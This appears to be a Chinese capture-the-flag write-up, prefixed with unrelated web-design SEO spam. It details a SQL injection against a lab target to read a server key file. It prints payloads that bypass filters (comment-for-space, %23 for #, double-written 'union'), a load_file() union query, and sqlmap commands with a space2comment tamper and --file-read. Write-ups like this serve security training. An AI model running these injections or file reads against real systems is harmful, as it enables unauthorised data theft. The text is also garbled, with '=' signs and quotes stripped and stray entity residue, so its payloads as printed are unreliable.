上海徐汇区网站建设公司,青岛模板建站,百度验证网站的好处,百度推广销售话术url#xff1a;http://192.168.154.253:81/ #打开http://XXX:81/#xff0c;XXX为靶机的ip地址 审题 1、打开题目看到有一个提示#xff0c;此题目需要通过SQL注入漏洞读取/tmp/360/key文件#xff0c;key在这个文件中 2、开始答题 发现这里url中有一个id的参数#xff0… urlhttp://192.168.154.253:81/ #打开http://XXX:81/XXX为靶机的ip地址 审题 1、打开题目看到有一个提示此题目需要通过SQL注入漏洞读取/tmp/360/key文件key在这个文件中 2、开始答题 发现这里url中有一个id的参数并且给出了当前所执行的sql语句 第一步判断注入点 1、?id1 2、?id1and11 第二步判断语句模板 1、使用 order by 判断语句模板列数 发现语句在执行中过滤了空格还过滤了“#” 执行失败 ?id1and11order by 3# ?id1and11orderby3# 执行成功 ?id1)and11order/**/by/**/3%23 解释 ?id1)and11order/**/by/**/3%23 )用来闭合前面的语句order/**/by/**/3%23order by 3用来查询模板列数 /**/用注释的方式代替空格%23使用url编码代替# 2、判断出语句模板有4个字段 回显正常 ?id1)and11order/**/by/**/4%23 #执行 order by 4 的时候回显正常 回显不正常 ?id1)and11order/**/by/**/5%23 #执行 order by 5 的时候回显不正常 第三步找回显点 回显不正常 ?id1)and12union/**/select/**/1,2,3,4%23 思路使用 and 12 报错找回显点 回显正常 ?id1)and12uunionnion/**/select/**/1,2,3,4%23 思路由于过滤了union所以这里使用双写的方式经行过滤绕过并且判断出回显点有3个语句模板中的234位置均为回显点 第四步拿到flag 执行成功 ?id1)and12uunionnion/**/select/**/1,database(),load_file(/tmp/360/key),user()%23 解释 —— 1)and12union/**/select/**/1,database(),load_file(/tmp/360/key),user()#) database() #当前数据库名 user() #当前数据库用户名 load_file(/tmp/360/key) #读取服务器文件 扩展使用sqlmap一把梭哈 1、由于前面判断出了此题注入点存在过滤空格的情况所以在使用sqlmap的时候需要指定脚本用注释/**/替换空格字符 --tamper space2comment.py运行 命令 python sqlmap.py -u http://192.168.154.253:81/vulnerabilities/fu1.php?id1 --tamper space2comment.py #我用的是sqlmap.py脚本所以使用python执行用kali就直接用第二条命令就行sqlmap -u http://192.168.154.253:81/vulnerabilities/fu1.php?id1 --tamper space2comment.py 命令 python sqlmap.py -u http://192.168.154.253:81/vulnerabilities/fu1.php?id1 --tamper space2comment.py --file-read /tmp/360/key #我用的是sqlmap.py脚本所以使用python执行用kali就直接用第二条命令就行sqlmap -u http://192.168.154.253:81/vulnerabilities/fu1.php?id1 --tamper space2comment.py --file-read /tmp/360/key 2、获取到flag